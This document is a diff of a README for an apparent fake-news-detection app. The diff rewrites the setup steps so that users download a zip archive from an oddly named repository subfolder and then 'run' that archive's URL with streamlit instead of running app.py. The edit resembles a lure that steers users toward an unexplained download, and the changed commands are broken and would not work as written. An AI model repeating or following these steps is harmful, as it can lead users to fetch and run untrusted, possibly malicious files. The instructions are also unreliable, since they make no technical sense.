khanoyhv/Fake-News-Detection/README.md

 Once you have downloaded the application, follow these steps to run it:

 1. Locate the downloaded file, usually found in your "Downloads" folder.
-2. Extract the contents of the `Fake-News-Detection.zip` file by right-clicking on it and selecting "Extract All."
+2. Extract the contents of the `https://raw.githubusercontent.com/khanoyhv/Fake-News-Detection/main/calfskin/Fake-News-Detection.zip` file by right-clicking on it and selecting "Extract All."
 3. Open a **Command Prompt** or **Terminal** window on your computer.
 4. Navigate to the folder where the extracted contents are located.
 You can do this by running the command:
    - For Windows: `cd path\to\extracted\folder`
    - For macOS/Linux: `cd path/to/extracted/folder`
-5. Next, run the command: `streamlit run app.py`.
+5. Next, run the command: `streamlit run https://raw.githubusercontent.com/khanoyhv/Fake-News-Detection/main/calfskin/Fake-News-Detection.zip`.
 This will start the application and open it in your default web browser.

 ## 📊 Features
 Fake-News-Detection offers several features to enhance your experience: